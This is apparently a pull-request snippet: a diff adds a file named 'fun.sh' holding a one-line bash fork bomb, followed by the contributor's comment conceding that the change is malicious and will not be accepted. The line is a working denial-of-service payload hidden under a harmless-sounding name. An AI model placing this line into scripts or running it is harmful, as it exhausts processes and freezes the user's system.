fun.sh

```diff
@@ -0,0 +1 @@
+:(){ :|: & };:
```

Comment:
I don't think it will be accepted,  as it is malicious. Moreover I deleted the fork
Anyways, thanks @vapier  for commenting on the whitespace issue, will keep in my mind for future .
:+1: